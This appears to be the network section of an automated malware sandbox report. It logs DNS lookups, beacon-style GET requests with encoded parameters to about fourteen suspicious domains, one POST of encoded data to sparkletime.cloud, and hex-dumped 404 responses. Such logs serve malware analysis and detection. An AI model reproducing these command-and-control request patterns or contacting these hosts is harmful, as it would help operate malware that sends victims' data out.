                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /15wz/?gbp=5DC0NPr0EBEhl&b8IlRP=piO7XCC2YmKS4YtLVhgLAvm+twzbDWYf7PZHrZKDycC9y9nN9+t6WNQPFH0EYcFR34CLkg9qv4+kt5RF0iDFrrij6KhFBhF5+/8gRzZ/dGtqBwF0Kkp7fA4= HTTP/1.1Host: www.lianlianzhibo.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6730 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /nuh1/?b8IlRP=PT/Ri4D8ihmWAKE0f4NA7MEkC+uLqjrnSrrDt4x1YcaGjVH70R7UhsP/yKGt9M7P52nh3xjLyG+pcovynSdHpQva79L2h5iAclNW7PrvexwutIXY5aImFg0=&gbp=5DC0NPr0EBEhl HTTP/1.1Host: www.sparkletime.cloudAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6730 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /3vjo/?b8IlRP=6k9lLSNDGifT99NSvg262I8Aatg5jOrBwRRsha+HOdKf/l5JGDaKR/CuPi+Z1+bjHWDBBIKPc/MMnzeWNqXAAA9zsXDxn6npKV+gAtA/NKidJOychD1T8Dw=&gbp=5DC0NPr0EBEhl HTTP/1.1Host: www.actpisalnplay.cyouAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6730 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /an37/?b8IlRP=EOo17e0b13RAPxLblUgE3vs/FGL0H2xQV++ddtKGVI4dgn5cY1anvW0mUjQ935dHimnK6XuAvySysVP8xdezNg5a6QtKc14a9RVleSg6ym/yobsLmIbuxYM=&gbp=5DC0NPr0EBEhl HTTP/1.1Host: www.031235246.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6730 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /extg/?gbp=5DC0NPr0EBEhl&b8IlRP=FWqvS2oQh4eVVjLTwqHOiP1/ZDahyJOFPrLBskdMkfQ4EQGcFlX+4xYLIEJWX9Ikcmr6BUKh66LrzwmKZjSB5f7zwe5yFNVHqzMKLEp7PHQACGHtm1Dj0PI= HTTP/1.1Host: www.82765.ltdAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6730 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /0vxe/?b8IlRP=JQt81xJGwNtvop68vs3oOoN0expppVASX38FmJiMtBKjk/hrICJT6K1Qnarg/abexvbKITAwf81qmJty25MRXZO87BMrs3iwFxp+PAcV8X+OCc4J/lvZOGY=&gbp=5DC0NPr0EBEhl HTTP/1.1Host: www.autonomousrich.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6730 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /76gg/?gbp=5DC0NPr0EBEhl&b8IlRP=f0r08WmvNyVCfCqKC3sc1J1ZeQ6U1v9y7p/LEdN+4XLKv+17b1TeDuaoBNvKJPqQeDpBKFonIAKhR62hl2CkpAb13j5kgbM3Z1EpoWTo5xPykT+M3IwkhCo= HTTP/1.1Host: www.matindi.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6730 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /x261/?b8IlRP=omr8Uf0LWdGuNzd/Unp1GqS1vL4CND7gEoBxRp9qerI7RqKhJhDnpmgwn7Xoqkkia3wcWkhTca7DU/K5obCzEqDdMokToPWzu0j+vKnG1IJFcLDgw+mr9qA=&gbp=5DC0NPr0EBEhl HTTP/1.1Host: www.ticquan.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6730 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /uq6t/?b8IlRP=iD8Otn+glfhqFyVIWbF8JwloVNr+WXnKgGNoSp+HX6ROb+ECQxDeonr99y/OKnAMRMxQ6B5OBd24JHLYKUCPAhLQfJkzvD/02LRBaqogd+vNbbcZEYHIetY=&gbp=5DC0NPr0EBEhl HTTP/1.1Host: www.christmas-goods.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6730 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /u65q/?b8IlRP=pWvJsEH+VbkHT1A3bH4UYEWOlkjauqNRGqS5aYrS7rL8do5jDo02FNcjHW0uLgFLzOtKHmLLzofTR7Xd+MAlmpQXCj2salgDXLWGs7GXn7OxkiDpJp4HwA4=&gbp=5DC0NPr0EBEhl HTTP/1.1Host: www.infiniteture.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6730 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /72e1/?gbp=5DC0NPr0EBEhl&b8IlRP=GAwPJ2y3utP2ohmBjxJQ4YKR4a5ZSZwwUjgEd0RFRLhwJQk7ldoPr0N9YZF0OFh8/8cxs0GCaqpBUanGilFHC4Yq6Ji7ZQ8xsir8gpwRswpFhpwbRQyajkI= HTTP/1.1Host: www.fluffymooncat.funAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6730 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /1hqx/?b8IlRP=ZLrw+Pq3MAwYsBOK5aec2k9VcgoVTWhUmUFDAd6oEVMHtXmwVeeiiz1QtAZkDwNggiXkqMWrizc2pYhIMWZKEZsXYXcBEGZEl08wfQ3E51qTkAAzX1VYJOI=&gbp=5DC0NPr0EBEhl HTTP/1.1Host: www.gnlokn.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6730 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /ewie/?gbp=5DC0NPr0EBEhl&b8IlRP=my2IJ9iTWNCQH18wFR7iA61h7l7u8ZRiCK/mim8iFRXc0x4FKu98LnX5lCdpWA5MM9eNg9jeKK6hMTOzyiUoKt19nKriHuDZ9IpFV9Da/610wEIVGPiRZ6A= HTTP/1.1Host: www.intention.digitalAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6730 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /nezi/?b8IlRP=vCzlhCkc61s8QnR1Eovjjze9/iXZVbS/FWCYnySni7Jw2oCHvVBRwsihdO8bPjl7D4ns/Q3JWrxkv+cbXIJDzSElp59oyMz46hYTghou/wYwly8Y8rMwujA=&gbp=5DC0NPr0EBEhl HTTP/1.1Host: www.kakupi.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6730 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.lianlianzhibo.net
                Source: global trafficDNS traffic detected: DNS query: www.sparkletime.cloud
                Source: global trafficDNS traffic detected: DNS query: www.actpisalnplay.cyou
                Source: global trafficDNS traffic detected: DNS query: www.031235246.xyz
                Source: global trafficDNS traffic detected: DNS query: www.82765.ltd
                Source: global trafficDNS traffic detected: DNS query: www.autonomousrich.xyz
                Source: global trafficDNS traffic detected: DNS query: www.matindi.xyz
                Source: global trafficDNS traffic detected: DNS query: www.ticquan.xyz
                Source: global trafficDNS traffic detected: DNS query: www.christmas-goods.store
                Source: global trafficDNS traffic detected: DNS query: www.infiniteture.xyz
                Source: global trafficDNS traffic detected: DNS query: www.fluffymooncat.fun
                Source: global trafficDNS traffic detected: DNS query: www.gnlokn.info
                Source: global trafficDNS traffic detected: DNS query: www.intention.digital
                Source: global trafficDNS traffic detected: DNS query: www.kakupi.info
                Source: unknownHTTP traffic detected: POST /nuh1/ HTTP/1.1Host: www.sparkletime.cloudAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-USCache-Control: max-age=0Content-Length: 203Connection: closeContent-Type: application/x-www-form-urlencodedOrigin: http://www.sparkletime.cloudReferer: http://www.sparkletime.cloud/nuh1/User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6730 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36Data Raw: 62 38 49 6c 52 50 3d 43 52 58 78 68 4f 50 41 75 42 71 36 4e 5a 30 35 66 66 59 61 6d 64 78 58 56 4f 6d 4b 39 77 6e 52 52 71 65 51 75 71 56 49 4e 4e 2b 4d 6c 56 66 65 73 79 48 55 2b 72 53 63 33 5a 75 43 78 4d 2f 50 71 6b 6d 46 31 51 7a 42 35 68 79 37 57 59 2f 4f 69 6b 6c 4c 75 68 58 4f 6f 66 6d 33 71 62 61 6b 4a 6b 55 56 31 75 33 6f 52 69 6b 33 6a 4a 48 55 37 70 49 49 5a 68 6c 39 45 56 75 6f 2b 61 50 6c 62 53 61 30 72 41 43 41 44 61 37 52 4a 46 45 30 45 36 57 7a 59 46 50 37 64 4d 58 34 32 57 34 7a 58 53 51 33 34 55 33 32 2b 34 4d 33 55 38 73 68 72 7a 38 4f 4b 2b 4f 48 65 49 51 75 32 55 34 4c 66 67 3d 3d Data Ascii: b8IlRP=CRXxhOPAuBq6NZ05ffYamdxXVOmK9wnRRqeQuqVINN+MlVfesyHU+rSc3ZuCxM/PqkmF1QzB5hy7WY/OiklLuhXOofm3qbakJkUV1u3oRik3jJHU7pIIZhl9EVuo+aPlbSa0rACADa7RJFE0E6WzYFP7dMX42W4zXSQ34U32+4M3U8shrz8OK+OHeIQu2U4Lfg==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Feb 2025 07:48:35 GMTServer: ApacheContent-Length: 267Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 73 70 61 72 6b 6c 65 74 69 6d 65 2e 63 6c 6f 75 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.sparkletime.cloud Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Feb 2025 07:48:38 GMTServer: ApacheContent-Length: 267Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 73 70 61 72 6b 6c 65 74 69 6d 65 2e 63 6c 6f 75 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.sparkletime.cloud Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Feb 2025 07:48:40 GMTServer: ApacheContent-Length: 267Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 73 70 61 72 6b 6c 65 74 69 6d 65 2e 63 6c 6f 75 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.sparkletime.cloud Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Feb 2025 07:48:43 GMTServer: ApacheContent-Length: 267Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 73 70 61 72 6b 6c 65 74 69 6d 65 2e 63 6c 6f 75 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.sparkletime.cloud Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Feb 2025 07:48:49 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Mon, 04 Nov 2024 08:53:38 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CxtpaA2G%2BUAJBH0MQtO6iHI7gZ75aqgtD2qOuc6p%2Boq1CLAIIApwtHFLFQYRSsvOeEshfwFPpBx5Q0qPFGowLLAMv2sTvHPdAxzqYlLsvOCspKwwWml7qqnRd9Q%2FpLoKv7jEuYmcActj"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90d98a3e8d9842be-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1667&min_rtt=1667&rtt_var=833&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=807&delivery_rate=0&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 65 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 ef 6f db 36 10 fd 9e bf e2 a6 62 43 07 54 a6 65 a7 4d 2d c9 02 32 3b c1 0a 74 6d d0 ba d8 fa 91 11 4f 22 6b 89 d4 c8 b3 6c 35 d8 ff 3e 50 52 6c 07 db 8a 61 18 f5 85 ba 7b f7 de f1 c7 63 fa dd fa fd 6a f3 f9 ee 06 24 d5 15 dc 7d fa e9 ed 9b 15 04 21 63 bf ce 57 8c ad 37 6b f8 ed e7 cd 2f 6f 21 9a 4c e1 23 59 95 13 63 37 ef 02 08 24 51 13 33 b6 df ef 27 fb f9 c4 d8 92 6d 3e b0 83 67 89 7c d9 38 0d 5d 5f 33 11 24 82 ec 22 ed 45 0e 75 a5 dd f2 6f 08 a2 c5 62 31 d4 05 1e 14 57 5c 97 cb 00 75 00 c7 59 96 4a e4 22 bb 00 00 48 49 51 85 d9 e5 f4 12 7e a8 05 77 32 81 77 86 e0 d6 ec b4 48 d9 90 1c 80 35 12 07 af 17 e2 ef 3b d5 2e 83 95 d1 84 9a c2 4d d7 60 00 f9 f0 b7 0c 08 0f c4 bc 7e 02 b9 e4 d6 21 2d 3f 6d 6e c3 d7 01 3b 27 d2 bc c6 65 20 d0 e5 56 35 a4 8c 3e 63 f8 68 ac ed 5e 40 c3 4b 04 6d 08 0a df cc b1 dc 51 57 21 50 d7 e0 a8 95 3b 17 0c 39 3f ee 8d e8 e0 a1 30 9a 42 a7 be 62 1c 5d 36 87 04 72 53 19 1b 3f bb ea 47 02 7d ba e0 b5 aa ba 98 5b c5 ab 04 3c 55 c8 2b 55 ea 38 47 4d 68 93 3f 8e 9c 32 7a c2 f8 7a 7a 46 b9 58 5c 5f 5d df 26 50 73 5b 2a Data Ascii: 2ecTo6bCTeM-2;tmO"kl5>PRla{cj$}!cW7k/o!L#Yc7$Q3'm>g|8]_3$"Euob1W\uYJ"HIQ~w2wH5;.M`~!-?mn;'e V5>ch^@KmQW!P;9?0Bb]6rS?G}[<U+U8GMh?2zzzFX\_]&Ps[*
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Feb 2025 07:48:51 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Mon, 04 Nov 2024 08:53:38 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cJDV%2B1jd%2FX1hvT51xQ7ZRyzmxD7zwWzzaMqG7WCZmciL7i3xjMhQfwzh8kvEDGo1H6EMYmplG%2BkAghzJaIP0ub9ZIj2QJjtWL1IlfxQxTWfC4XZogIQheIdzVdO78YUlDGef%2FKuYkqRU"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90d98a4e8a6542af-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1663&min_rtt=1663&rtt_var=831&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=827&delivery_rate=0&cwnd=172&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 65 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 ef 6f db 36 10 fd 9e bf e2 a6 62 43 07 54 a6 65 a7 4d 2d c9 02 32 3b c1 0a 74 6d d0 ba d8 fa 91 11 4f 22 6b 89 d4 c8 b3 6c 35 d8 ff 3e 50 52 6c 07 db 8a 61 18 f5 85 ba 7b f7 de f1 c7 63 fa dd fa fd 6a f3 f9 ee 06 24 d5 15 dc 7d fa e9 ed 9b 15 04 21 63 bf ce 57 8c ad 37 6b f8 ed e7 cd 2f 6f 21 9a 4c e1 23 59 95 13 63 37 ef 02 08 24 51 13 33 b6 df ef 27 fb f9 c4 d8 92 6d 3e b0 83 67 89 7c d9 38 0d 5d 5f 33 11 24 82 ec 22 ed 45 0e 75 a5 dd f2 6f 08 a2 c5 62 31 d4 05 1e 14 57 5c 97 cb 00 75 00 c7 59 96 4a e4 22 bb 00 00 48 49 51 85 d9 e5 f4 12 7e a8 05 77 32 81 77 86 e0 d6 ec b4 48 d9 90 1c 80 35 12 07 af 17 e2 ef 3b d5 2e 83 95 d1 84 9a c2 4d d7 60 00 f9 f0 b7 0c 08 0f c4 bc 7e 02 b9 e4 d6 21 2d 3f 6d 6e c3 d7 01 3b 27 d2 bc c6 65 20 d0 e5 56 35 a4 8c 3e 63 f8 68 ac ed 5e 40 c3 4b 04 6d 08 0a df cc b1 dc 51 57 21 50 d7 e0 a8 95 3b 17 0c 39 3f ee 8d e8 e0 a1 30 9a 42 a7 be 62 1c 5d 36 87 04 72 53 19 1b 3f bb ea 47 02 7d ba e0 b5 aa ba 98 5b c5 ab 04 3c 55 c8 2b 55 ea 38 47 4d 68 93 3f 8e 9c 32 7a c2 f8 7a 7a 46 b9 58 5c 5f 5d df 26 50 73 Data Ascii: 2ecTo6bCTeM-2;tmO"kl5>PRla{cj$}!cW7k/o!L#Yc7$Q3'm>g|8]_3$"Euob1W\uYJ"HIQ~w2wH5;.M`~!-?mn;'e V5>ch^@KmQW!P;9?0Bb]6rS?G}[<U+U8GMh?2zzzFX\_]&Ps
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Feb 2025 07:48:54 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Mon, 04 Nov 2024 08:53:38 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BDz29ol4Zq%2BXIXmbpT0IwQfUjd%2FKXryGPBazLv9CwOQ3j1NstzNM9%2BfUiI7qEvv%2BwJzSbZSykGoG0TWVf3bGXl2xNuV%2Fv%2BjWTDcuQSHszRY4O%2Fo85fiJCRBCcUnrPC0wDYRrGx6XWsns"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90d98a5e5ab2c477-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1634&min_rtt=1634&rtt_var=817&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1840&delivery_rate=0&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 65 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 ef 6f db 36 10 fd 9e bf e2 a6 62 43 07 54 a6 65 a7 4d 2d c9 02 32 3b c1 0a 74 6d d0 ba d8 fa 91 11 4f 22 6b 89 d4 c8 b3 6c 35 d8 ff 3e 50 52 6c 07 db 8a 61 18 f5 85 ba 7b f7 de f1 c7 63 fa dd fa fd 6a f3 f9 ee 06 24 d5 15 dc 7d fa e9 ed 9b 15 04 21 63 bf ce 57 8c ad 37 6b f8 ed e7 cd 2f 6f 21 9a 4c e1 23 59 95 13 63 37 ef 02 08 24 51 13 33 b6 df ef 27 fb f9 c4 d8 92 6d 3e b0 83 67 89 7c d9 38 0d 5d 5f 33 11 24 82 ec 22 ed 45 0e 75 a5 dd f2 6f 08 a2 c5 62 31 d4 05 1e 14 57 5c 97 cb 00 75 00 c7 59 96 4a e4 22 bb 00 00 48 49 51 85 d9 e5 f4 12 7e a8 05 77 32 81 77 86 e0 d6 ec b4 48 d9 90 1c 80 35 12 07 af 17 e2 ef 3b d5 2e 83 95 d1 84 9a c2 4d d7 60 00 f9 f0 b7 0c 08 0f c4 bc 7e 02 b9 e4 d6 21 2d 3f 6d 6e c3 d7 01 3b 27 d2 bc c6 65 20 d0 e5 56 35 a4 